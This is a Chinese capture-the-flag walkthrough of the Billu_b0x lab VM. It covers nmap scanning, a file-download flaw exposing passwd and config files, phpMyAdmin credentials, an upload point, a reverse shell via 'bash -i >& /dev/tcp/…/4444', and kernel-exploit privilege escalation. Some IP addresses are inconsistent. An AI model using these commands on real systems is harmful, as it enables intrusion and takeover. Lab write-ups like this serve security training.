Billu_b0x靶场复现

Billu_b0x靶场复现

环境准备:
Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址

kali linux 2020虚拟机,ip地址192.168.120.133
kali linux 2020虚拟机,ip地址192.168.120.141

1.信息收集

nmap -sP 192.168.1.0/24

使用nmap扫描本网段主机,其中192.168.120.1为网卡地址,192.168.120.2为网关,133为本机地址,目标靶机ip为192.168.1.141

主机发现:nmap -sP 192.168.120.0/24

在这里插入图片描述
2.端口及服务扫描
使用nmap进行端口和服务扫描,指定1-65535全端口,并添加参数A做服务识别和深度扫描

nmap -p1-65535 -A 192.168.120.141

在这里插入图片描述
从上图中可以看到,靶机是一台ubuntu,开启http服务,访问上去看一下
在这里插入图片描述

使用御剑扫描文件
在这里插入图片描述
得到页面较多,head.Php test.php、in.php、c.php、index.php、show.php等
3.漏洞挖掘
访问test.php:页面提示file参数为空,需要提供file参数
在这里插入图片描述
这里存在文件下载漏洞:下载passwd文件和c.php文件
在这里插入图片描述
在这里插入图片描述
Passwd存在一些用户:games,deamon,gnats,ica
查看passwd文件,发现1个id 1000的账号ica,ssh连接的用户名可以是ica或root
在这里插入图片描述
并且c.php文件中存在数据库连接配置信息(http://192.168.120.141/phpmy/)
在这里插入图片描述
Image目录
在这里插入图片描述
通过dirb暴破出/phpmy目录,访问该目录到phpmyadmin登录页面,登录后查看web用户名密码:biLLu hEx_it
在这里插入图片描述
进入网站
在这里插入图片描述
在添加用户处存在上传点,尝试文件上传获取shell,可能存在
文件包含漏洞(失败)
在这里插入图片描述
在这里插入图片描述
在show—user中复制图片url:http://192.168.120.141/uploaded_images/a.jpg,
在这里插入图片描述

将bash先进行base64后面url编码

echo "bash -i >& /dev/tcp/192.168.20.133/4444 0>&1" | bash

在这里插入图片描述
在kali开启尝试反弹shell
在这里插入图片描述
反弹成功
在这里插入图片描述
.将bash先进行base64后面url编码

echo "bash -i >& /dev/tcp/192.168.20.133/4444 0>&1" | bash

在这里插入图片描述
反弹shell成功
在这里插入图片描述
查看内核版本和当前权限
在这里插入图片描述
查找exp:searchsploit -s linux kernel 3.13.0
在这里插入图片描述
查找exp路径并且复制到/root目录下
在这里插入图片描述
开启http服务进行远程下载
在这里插入图片描述
下载完成在/tmp目录下
在这里插入图片描述
然后gcc编译执行后,提权成功
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

苏同学的安全屋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值